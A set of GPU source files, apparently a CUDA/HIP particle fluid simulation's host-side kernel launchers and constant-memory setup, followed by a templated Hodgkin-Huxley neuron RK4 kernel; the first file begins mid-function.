CudaSafeCall(hipMemcpyToSymbol(c_daTriangles, &Triangles, sizeof(Triangles))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_TriangleNum, &TriangleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daTrianglesParameters, &TriangleParameters, sizeof(TriangleParameters))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_MaxParticleNum, &MaxParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daSTLDistance, &STLDistance, sizeof(STLDistance))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daSTLID, &StlID, sizeof(STLID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daCell, &Cell, sizeof(Cell))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_CellNum, &CellNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_cellStart, &CellStart, sizeof(CellStart))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_cellEnd, &CellEnd, sizeof(CellEnd))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_gridParticleIndex, &GridParticleIndex, sizeof(GridParticleIndex))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall( hipMemcpyToSymbol(CONSTANT_BOUNDINGBOX, &BoundingBox, sizeof(CGridBox)) ); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstOutPutParticles(Integer * OutputParticleID, Scalar3 * OutputParticlePosition, Scalar3 * OutputParticleVelocity, Scalar * OutputParticlePressure, Scalar * OutputParticleDensity, Scalar * OutputParticleTemperature, Scalar * OutputParticleKineticViscosity, Scalar * OutputParticleSolidPhaseRate, ParticleType * OutputParticleType) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleID,&OutputParticleID, sizeof(OutputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticlePosition,&OutputParticlePosition, sizeof(OutputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleVelocity,&OutputParticleVelocity, sizeof(OutputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticlePressure,&OutputParticlePressure, sizeof(OutputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleDensity,&OutputParticleDensity, sizeof(OutputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleTemperature,&OutputParticleTemperature, sizeof(OutputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleKineticViscosity,&OutputParticleKineticViscosity, sizeof(OutputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleSolidPhaseRate,&OutputParticleSolidPhaseRate, sizeof(OutputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleType,&OutputParticleType, sizeof(OutputParticleType))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstInputParticles(Integer * InputParticleID, Scalar3 * InputParticlePosition, Scalar3 * InputParticleVelocity, Scalar * InputParticlePressure, Scalar * InputParticleDensity, Scalar * InputParticleTemperature, Scalar * InputParticleKineticViscosity, Scalar * InputParticleSolidPhaseRate, ParticleType * InputParticleType, Scalar* ParticleTurbulaceViscosity, Scalar* ParticleStrainTensorProduct) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleID,&InputParticleID, sizeof(InputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticlePosition,&InputParticlePosition, sizeof(InputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleVelocity,&InputParticleVelocity, sizeof(InputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticlePressure,&InputParticlePressure, sizeof(InputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleDensity,&InputParticleDensity, sizeof(InputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleTemperature,&InputParticleTemperature, sizeof(InputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleKineticViscosity,&InputParticleKineticViscosity, sizeof(InputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleSolidPhaseRate,&InputParticleSolidPhaseRate, sizeof(InputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleType,&InputParticleType, sizeof(InputParticleType))); CCT_ERROR_CHECK(Status); //Turbulace Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleTurbulaceViscosity,&ParticleTurbulaceViscosity, sizeof(ParticleTurbulaceViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleStrainTensorProduct,&ParticleStrainTensorProduct, sizeof(ParticleStrainTensorProduct))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType ParticleNumberToConst(Integer ParticleNum) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); //check_cuda_errors(__FILE__, __LINE__); CCT_ERROR_CHECK(Status); return CCT_NOERR; } CCTStatusType DragParametersToConst(DragParameter *InputDragParameter,Scalar3 *InputDragAcc,Scalar* InputDragTemperature ,Integer DragTriangleNum,Integer * MagnifierCount,CDragTriangle * DragTriangles) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_daSTLDragParameter,&InputDragParameter, sizeof(InputDragParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daDragAcc,&InputDragAcc, sizeof(InputDragAcc))); CCT_ERROR_CHECK(Status); //For Drag Temperature Status = CudaSafeCall(hipMemcpyToSymbol(c_daDragTemperature,&InputDragTemperature, sizeof(InputDragTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_DragTriangleNum, &DragTriangleNum, sizeof(DragTriangleNum))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daMagnifierCount, &MagnifierCount, sizeof(MagnifierCount))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daDragTriangles, &DragTriangles, sizeof(DragTriangles))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } }
f87d8ec53c60c1341ca2d987fa2943b31d98329e.cu
#include <stdio.h> #include "DataType.h" #include "DeviceProcess.h" #include "DeviceProcess_Kernel.h" #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <thrust/sequence.h> #include <thrust/random.h> #include <thrust/generate.h> #include <thrust/detail/type_traits.h> #include "IO.h" #include "Configuration.h" #define USECDUASTREAM //Round a / b to nearest higher integer value unsigned int iDivUp(unsigned int a, unsigned int b){ return (a % b != 0) ? (a / b + 1) : (a / b); } class CThreadScaler { private: Integer Dg; Integer Db; public: CThreadScaler(Integer NumThreads) { Db = min ( BLOCK_MAX_DIM, NumThreads); if(Db > 0) { Dg = iDivUp(NumThreads, Db); }else { Dg = 0; } } Integer Grids() { return Dg; } Integer Blocks() { return Db; } }; extern "C" { /*inline void check_cuda_errors(const char *filename, const int line_number) { #ifdef DEBUG cudaThreadSynchronize(); cudaError_t error = cudaGetLastError(); if(error != cudaSuccess) { printf("CUDA error at %s:%i: %s\n", filename, line_number, cudaGetErrorString(error)); exit(-1); } #endif }*/ CCTStatusType CalcTurbulenceViscosity(cudaStream_t &Stream,Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); CalcTurbulenceViscosity_Kernel<<<TS.Grids(), TS.Blocks() ,0,Stream>>>(ComputeParticleNum); //std::string kernelName = "CalcTurbulenceViscosity"; //WriteConstant(kernelName,ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check Particle outside compute zone starts CCTStatusType CheckParticleOutsideComputeZone(cudaStream_t &Stream,Integer *ParticleNum) { if((*ParticleNum) > 0) { CThreadScaler TS(*ParticleNum); CheckParticleOutsideComputeZone_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check particle Outside Compute Zone Ends CCTStatusType CalcExplicitly(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); CalcExplicitly_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType ResetTriangleTopology(cudaStream_t &Stream,Integer CellNum, CCell* aCell) { if(CellNum > 0) { CThreadScaler TS(CellNum); ResetTriangleTopology_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(CellNum, aCell); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType RegisterTriangleTopology(cudaStream_t &Stream,CTriangle* daTriangle, Integer TriangleNum, CCell* daCell, Integer CellNum) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); RegisterTriangleTopology_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(daTriangle, TriangleNum, daCell, CellNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType UpdateTrianglePosition(cudaStream_t &Stream,const Integer TriangleNum, CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); UpdateTrianglePosition_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(TriangleNum, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType RotateTrianglePosition(cudaStream_t &Stream,const Integer TriangleNum,CTriangle* daTriangles, const Integer analysisStep) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); RotateTrianglePosition_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(TriangleNum, daTriangles, analysisStep); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType ResetWallPosition(cudaStream_t &Stream,const Integer TriangleNum,const Integer AnalysisStep,const CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); ResetWallPosition_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(TriangleNum,AnalysisStep, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType CalcSTLDistance(cudaStream_t &Stream, Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CThreadScaler TS(ComputeParticleNum); CalcSTLDistance_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CaculateCellIDandInitializeHash(cudaStream_t &Stream,Integer ParticleNum,Integer CellNum,int* dGridParticleHash, int* dGridParticleIndex, Scalar3* particlePosition) { if(ParticleNum > 0) { CThreadScaler TS(ParticleNum); // calculate grid hash calcHashD<<<TS.Grids(), TS.Blocks() ,0,Stream>>>(ParticleNum,dGridParticleHash,dGridParticleIndex,particlePosition); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType reorderDataAndFindCellStart(cudaStream_t& Stream,Integer numParticles,Integer numCells , int* gridParticleHash, int* gridParticleIndex, int* cellStart, int* cellEnd) { if(numParticles > 0) { CThreadScaler TS(numParticles); // set all cells to empty cudaMemsetAsync(cellStart, 0xffffffff, numCells*sizeof(int),Stream); cudaMemsetAsync(cellEnd, 0xffffffff, numCells*sizeof(int),Stream); int smemSize = sizeof(int)*(TS.Blocks()+1); reorderDataAndFindCellStartD<<< TS.Grids(), TS.Blocks(), smemSize,Stream>>>(numParticles,numCells,gridParticleHash, gridParticleIndex,cellStart, cellEnd); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType SortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType StableSortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::stable_sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType CalcDragEffect(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcDragEffect_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressure(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcExplicitPressure_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressureGradient(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcExplicitPressureGradient_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcTemperatureFactor(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcTemperatureFactor_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType InitializeDeviceMemConst(CParameter Parameter,Integer ParticleNum,CTriangle * Triangles,Integer TriangleNum,CTriangleParameters * TriangleParameters, Integer MaxParticleNum, CDistance * STLDistance,Integer * StlID, CCell * Cell,Integer CellNum, Integer * CellStart,Integer * CellEnd,Integer * GridParticleIndex, CGridBox BoundingBox) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(CONSTANT_PARAMETER, &Parameter, sizeof(CParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daTriangles, &Triangles, sizeof(Triangles))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_TriangleNum, &TriangleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daTrianglesParameters, &TriangleParameters, sizeof(TriangleParameters))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_MaxParticleNum, &MaxParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daSTLDistance, &STLDistance, sizeof(STLDistance))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daSTLID, &StlID, sizeof(STLID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daCell, &Cell, sizeof(Cell))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_CellNum, &CellNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_cellStart, &CellStart, sizeof(CellStart))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_cellEnd, &CellEnd, sizeof(CellEnd))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_gridParticleIndex, &GridParticleIndex, sizeof(GridParticleIndex))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall( cudaMemcpyToSymbol(CONSTANT_BOUNDINGBOX, &BoundingBox, sizeof(CGridBox)) ); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstOutPutParticles(Integer * OutputParticleID, Scalar3 * OutputParticlePosition, Scalar3 * OutputParticleVelocity, Scalar * OutputParticlePressure, Scalar * OutputParticleDensity, Scalar * OutputParticleTemperature, Scalar * OutputParticleKineticViscosity, Scalar * OutputParticleSolidPhaseRate, ParticleType * OutputParticleType) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleID,&OutputParticleID, sizeof(OutputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticlePosition,&OutputParticlePosition, sizeof(OutputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleVelocity,&OutputParticleVelocity, sizeof(OutputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticlePressure,&OutputParticlePressure, sizeof(OutputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleDensity,&OutputParticleDensity, sizeof(OutputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleTemperature,&OutputParticleTemperature, sizeof(OutputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleKineticViscosity,&OutputParticleKineticViscosity, sizeof(OutputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleSolidPhaseRate,&OutputParticleSolidPhaseRate, sizeof(OutputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleType,&OutputParticleType, sizeof(OutputParticleType))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstInputParticles(Integer * InputParticleID, Scalar3 * InputParticlePosition, Scalar3 * InputParticleVelocity, Scalar * InputParticlePressure, Scalar * InputParticleDensity, Scalar * InputParticleTemperature, Scalar * InputParticleKineticViscosity, Scalar * InputParticleSolidPhaseRate, ParticleType * InputParticleType, Scalar* ParticleTurbulaceViscosity, Scalar* ParticleStrainTensorProduct) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleID,&InputParticleID, sizeof(InputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticlePosition,&InputParticlePosition, sizeof(InputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleVelocity,&InputParticleVelocity, sizeof(InputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticlePressure,&InputParticlePressure, sizeof(InputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleDensity,&InputParticleDensity, sizeof(InputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleTemperature,&InputParticleTemperature, sizeof(InputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleKineticViscosity,&InputParticleKineticViscosity, sizeof(InputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleSolidPhaseRate,&InputParticleSolidPhaseRate, sizeof(InputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleType,&InputParticleType, sizeof(InputParticleType))); CCT_ERROR_CHECK(Status); //Turbulace Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleTurbulaceViscosity,&ParticleTurbulaceViscosity, sizeof(ParticleTurbulaceViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleStrainTensorProduct,&ParticleStrainTensorProduct, sizeof(ParticleStrainTensorProduct))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType ParticleNumberToConst(Integer ParticleNum) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); //check_cuda_errors(__FILE__, __LINE__); CCT_ERROR_CHECK(Status); return CCT_NOERR; } CCTStatusType DragParametersToConst(DragParameter *InputDragParameter,Scalar3 *InputDragAcc,Scalar* InputDragTemperature ,Integer DragTriangleNum,Integer * MagnifierCount,CDragTriangle * DragTriangles) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_daSTLDragParameter,&InputDragParameter, sizeof(InputDragParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daDragAcc,&InputDragAcc, sizeof(InputDragAcc))); CCT_ERROR_CHECK(Status); //For Drag Temperature Status = CudaSafeCall(cudaMemcpyToSymbol(c_daDragTemperature,&InputDragTemperature, sizeof(InputDragTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_DragTriangleNum, &DragTriangleNum, sizeof(DragTriangleNum))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daMagnifierCount, &MagnifierCount, sizeof(MagnifierCount))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daDragTriangles, &DragTriangles, sizeof(DragTriangles))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } }
b43225e91aa4b76e134719df9a49b8079dc59f34.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #define NVAR 2 #define NNEU %(nneu)d //NROW * NCOL // device compute submethods __device__ %(type)s compute_dV(%(type)s V, %(type)s n, %(type)s m, %(type)s h, %(type)s I, %(type)s C_m, %(type)s V_Na, %(type)s V_K, %(type)s V_l, %(type)s g_Na, %(type)s g_K, %(type)s g_l) { return (-1/C_m) * (g_K*n*n*n*n*(V-V_K) + g_Na*m*m*m*h*(V-V_Na) + g_l*(V-V_l)-I); } __device__ %(type)s compute_dn(%(type)s V, %(type)s n) { // LVS TODO: This seems hacky %(type)s alpha_n; if(V == -55.0) alpha_n = 0.1; else alpha_n = (-0.01*(55.0+V)) / (exp(-(55.0+V)/10.0)-1); %(type)s beta_n = 0.125 * exp(-(V+65)/80.0); return (alpha_n * (1-n) - beta_n * n); } __device__ %(type)s compute_dm(%(type)s V, %(type)s m) { %(type)s alpha_m; if(V == -40.0) alpha_m = 1.0; else alpha_m = (-0.1*(40+V)) / (exp(-(40+V)/10.0) - 1); %(type)s beta_m = 4 * exp(-(V+65)/18.0); return (alpha_m * (1-m) - beta_m * m); } __device__ %(type)s compute_dh(%(type)s V, %(type)s h) { %(type)s alpha_h = 0.07 * exp(-(V+65)/20.0); %(type)s beta_h = 1 / (exp(-(35+V)/10.0) + 1); return (alpha_h * (1-h) - beta_h * h); } // main kernel __global__ void hodgkin_huxley_rk4(%(type)s* g_V, %(type)s* g_n, %(type)s* g_m, %(type)s* g_h, int num_neurons, %(type)s* I_pre, %(type)s dt, %(type)s* C_m, %(type)s* V_Na, %(type)s* V_K, %(type)s* V_l, %(type)s* g_Na, %(type)s* g_K, %(type)s* g_l) { int bid = blockIdx.x; int cart_id = bid * NNEU + threadIdx.x; %(type)s I, V, n, m, h; if(cart_id < num_neurons) { I = I_pre[cart_id]; V = g_V[cart_id]; n = g_n[cart_id]; m = g_m[cart_id]; h = g_h[cart_id]; %(type)s k1_V, k2_V, k3_V, k4_V; %(type)s k1_n, k2_n, k3_n, k4_n; %(type)s k1_m, k2_m, k3_m, k4_m; %(type)s k1_h, k2_h, k3_h, k4_h; // RK4 using device derivative calculation functions k1_V = dt * compute_dV(V, n, m, h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k1_n = dt * compute_dn(V, n); k1_m = dt * compute_dm(V, m); k1_h = dt * compute_dh(V, h); k2_V = dt * compute_dV(V+0.5*k1_V, n+0.5*k1_n, m+0.5*k1_m, h+0.5*k1_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k2_n = dt * compute_dn(V+0.5*k1_V, n+0.5*k1_n); k2_m = dt * compute_dm(V+0.5*k1_V, m+0.5*k1_m); k2_h = dt * compute_dh(V+0.5*k1_V, h+0.5*k1_h); k3_V = dt * compute_dV(V+0.5*k2_V, n+0.5*k2_n, m+0.5*k2_m, h+0.5*k2_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k3_n = dt * compute_dn(V+0.5*k2_V, n+0.5*k2_n); k3_m = dt * compute_dm(V+0.5*k2_V, m+0.5*k2_m); k3_h = dt * compute_dh(V+0.5*k2_V, h+0.5*k2_h); k4_V = dt * compute_dV(V+k3_V, n+k3_n, m+k3_m, h+k3_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k4_n = dt * compute_dn(V+k3_V, n+k3_n); k4_m = dt * compute_dm(V+k3_V, m+k3_m); k4_h = dt * compute_dh(V+k3_V, h+k3_h); // compute new quantities V += (k1_V + 2*(k2_V + k3_V) + k4_V)/6.0; n += (k1_n + 2*(k2_n + k3_n) + k4_n)/6.0; m += (k1_m + 2*(k2_m + k3_m) + k4_m)/6.0; h += (k1_h + 2*(k2_h + k3_h) + k4_h)/6.0; g_V[cart_id] = V; g_n[cart_id] = n; g_m[cart_id] = m; g_h[cart_id] = h; } }
b43225e91aa4b76e134719df9a49b8079dc59f34.cu
